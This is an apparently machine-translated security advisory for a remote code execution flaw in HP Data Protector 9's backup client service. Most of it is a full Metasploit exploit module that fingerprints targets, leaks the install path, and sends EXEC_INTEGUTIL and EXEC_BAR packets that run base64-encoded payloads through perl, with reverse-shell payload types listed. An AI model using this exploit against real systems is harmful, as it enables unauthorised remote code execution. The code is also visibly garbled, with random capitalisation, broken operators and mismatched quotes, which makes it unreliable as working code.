HP Data Protector EXEC_INTEGUTIL Remote Code Execution Vulnerability
Release date:
Updated on:
Affected Systems:
HP Data Protector 9
Description:
HP OpenView Storage Data Protector is a software that automatically backs up and recovers a single server in an enterprise environment. It supports disk Storage or tape Storage targets.
HP Data Protector 9 triggers a vulnerability in the Backup client service when processing the EXEC_INTEGUTIL message. This service listens to TCP/555 by default, after successful exploitation, EXEC_INTEGUTIL data packets can be used to execute arbitrary code.
<* Source: Aniway. Anyway
*>
Test method:
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
##
# This module requires Metasploit: http // metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
Require 'msf/core'
Class Metasploit3 <Msf: Exploit: Remote
Rank = GreatRanking
Include Msf: Exploit: Remote: Tcp
Include Msf: Exploit: Powershell
Def initialize (info = {})
Super (update_info (info,
'Name' => 'hp Data Protector EXEC_INTEGUTIL Remote Code Execution ',
'Description' => % q {
This exploit abuses a vulnerability in the HP Data Protector. The vulnerability exists
In the Backup client service, which listens by default on TCP/5555. The EXEC_INTEGUTIL
Request allows to execute arbitrary commands from a restricted directory. Since it
Des a perl executable, it's possible to use an EXEC_INTEGUTIL packet to execute
Arbitrary code. On linux targets, the perl binary isn't on the restricted directory,
An EXEC_BAR packet can be used to access the perl binary, even in the last version of HP
Data Protector for linux. This module has been tested successfully on HP Data Protector
9 over Windows 2008 R2 64 bits and CentOS 6 64 bits.
},
'Author' =>
[
'Aniway. Anyway <Aniway. Anyway [at] gmail.com> ', # vulnerability discovery
'Juan vazquez' # msf module
],
'References '=>
[
['Zdi ', '14-344']
],
'Payload' =>
{
'Disablenops' => true
},
'Defaultopexception' =>
{
# The powershell embedded payload takes some time to deploy
'Wfsdelay' => 20
},
'Targets' =>
[
['Linux 64 bits/HP Data Protector 9 ',
{
'Platform' => 'unix ',
'Arch '=> ARCH_CMD,
'Payload' => {
'Compat' => {
'Payloadtype' => 'cmd cmd_bash ',
'Requiredcmd' => 'perl gawk bash-tcp openssl python generic'
}
}
}
],
['Windows 64 bits/HP Data Protector 9 ',
{
'Platform' => 'win ',
'Arch '=> ARCH_CMD,
'Payload' => {
'Compat' => {
'Payloadtype' => 'cmd ',
'Requiredcmd' => 'powershell'
}
}
}
]
],
'Defaulttarget' => 0,
'Privileged' => true,
'Disclosuredate' => 'oct' 2 2014'
))
Register_options (
[
Opt: RPORT (1, 5555)
], Self. class)
End
Def check
Fingerprint = get_fingerprint
If fingerprint. nil?
Return Exploit: CheckCode: Unknown
End
If fingerprint = ~ /Data Protector A \. (\ d + \. \ d + )/
Version = $1
Vprint_status ("# {peer}-Windows/HP Data Protector version # {version} found ")
Elsif fingerprint = ~ /INET/
Vprint_status ("# {peer}-Linux/HP Data Protector found ")
Return Exploit: CheckCode: Detected
Else
Return Exploit: CheckCode: Safe
End
If Gem: Version. new (version) <= Gem: Version. new ('9 ')
Return Exploit: CheckCode: Appears
End
Exploit: CheckCode: Detected # there is no patch at the time of module writing
End
Def exploit
Rand_exec = rand_text_alpha (8)
Print_status ("# {peer}-Leaking the HP Data Protector directory ...")
Leak = leak_hp_directory (rand_exec)
Dir = parse_dir (leak, rand_exec)
If dir. nil?
Dir = default_hp_dir
Print_error ("# {peer}-HP Data Protector dir not found, using the default # {dir }")
Else
Unless valid_target? (Dir)
Print_error ("# {peer}-HP Data Protector directory leaked as # {dir}, # {target. name} looks incorrect, trying anyway ...")
End
End
If target. name = ~ /Windows/
# Command = payload (payload. encoded, payload_instance.arch.first, {: remove_comspec => true,: encode_final_payload => true })
Print_status ("# {peer}-Executing payload ...")
Execute_windows (payload. encoded, dir)
Else
Print_status ("# {peer}-Executing payload ...")
Execute_linux (payload. encoded, dir)
End
End
Def peer
"# {Rhost }:# {rport }"
End
Def build_pkt (fields)
Data = "\ xff \ xfe" # BOM Unicode
Fields. each do | v |
Data <"# {Rex: Text. to_unicode (v)} \ x00 \ x00"
Data <Rex: Text. to_unicode ("") # Separator
End
Data. chomp! (Rex: Text. to_unicode ("") # Delete last separator
Return [data. length]. pack ("N") + data
End
Def get_fingerprint
Fingerprint = get_fingerprint_windows
If fingerprint. nil?
Fingerprint = get_fingerprint_linux
End
Fingerprint
End
Def get_fingerprint_linux
Connect
Sock. put ([2]. pack ("N") + "\ xff \ xfe ")
Begin
Res = sock. get_once (4)
Rescue EOFError
Disconnect
Return nil
End
If res. nil?
Disconnect
Return nil
Else
Length = res. unpack ("N") [0]
End
Begin
Res = sock. get_once (length)
Rescue EOFError
Return nil
Ensure
Disconnect
End
If res. nil?
Return nil
End
Res
End
Def get_fingerprint_windows
Connect
Sock. put (rand_text_alpha_upper (64 ))
Begin
Res = sock. get_once (4)
Rescue: Errno: ECONNRESET, EOFError
Disconnect
Return nil
End
If res. nil?
Disconnect
Return nil
Else
Length = res. unpack ("N") [0]
End
Begin
Res = sock. get_once (length)
Rescue EOFError
Return nil
Ensure
Disconnect
End
If res. nil?
Return nil
End
Rex: Text. to_ascii (res). chop. chomp # Delete unicode last null
End
Def leak_hp_directory (rand_exec)
Connect
Pkt = build_pkt ([
"2", # Message Type
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
"28", # Opcode EXEC_INTEGUTIL
Rand_exec,
])
Sock. put (pkt)
Begin
Res = sock. get_once (4)
Rescue EOFError
Disconnect
Return nil
End
If res. nil?
Disconnect
Return nil
Else
Length = res. unpack ("N") [0]
End
Begin
Res = sock. get_once (length)
Rescue EOFError
Return nil
Ensure
Disconnect
End
If res. nil?
Return nil
End
If res = ~ /No such file or directory/# Linux signature
Return res
Else # deal as windows target
Return Rex: Text. to_ascii (res). chop. chomp # Delete unicode last null
End
End
Def parse_dir (data, clue)
If data & data = ~ /The system cannot find the file specified \ .. * (..: \. *) bin \ # {clue }/
Dir = $1
Print_good ("# {peer}-HP Data Protector directory found on # {dir }")
Elsif data & data = ~ /\] \ X00 (\/. *) lbin \/# {clue} \ x00 \ [\ d \] No such file or directory/
Dir = $1
Print_good ("# {peer}-HP Data Protector directory found on # {dir }")
Else
Dir = nil
End
Dir
End
Def valid_target? (Dir)
If target. name = ~ /Windows/& dir = ~ /^ [A-Za-z]: \/
Return true
Elsif target. name = ~ /Linux/& dir. start_with? ('/')
Return true
End
False
End
Def default_hp_dir
If target. name = ~ /Windows/
Dir = 'C: \ Program Files \ OmniBack \\'
Else # linux
Dir = '/opt/omni/lbin /'
End
Dir
End
Def execute_windows (cmd, hp_dir)
Connect
Pkt = build_pkt ([
"2", # Message Type
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
"28", # Opcode EXEC_INTEGUTIL
"Perl.exe ",
"-I # {hp_dir} lib \ perl ",
"-MMIME: Base64 ",
"-E ",
"System (decode_base64 ('# {Rex: Text. encode_base64 (cmd )}'))"
])
Sock. put (pkt)
Disconnect
End
Def execute_linux (cmd, hp_dir)
Connect
Pkt = build_pkt ([
'2', # Message Type
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
'11', # Opcode EXEC_BAR
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
Rand_text_alpha (8 ),
"../Bin/perl ",
Rand_text_alpha (8 ),
"-I # {hp_dir} lib/perl ",
'-MMIME: base64 ',
'-E ',
"System (decode_base64 ('# {Rex: Text. encode_base64 (cmd )}'))"
])
Sock. put (pkt)
Disconnect
End
End
Suggestion:
Vendor patch:
HP
--
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://itrc.hp.com
This article permanently updates the link address: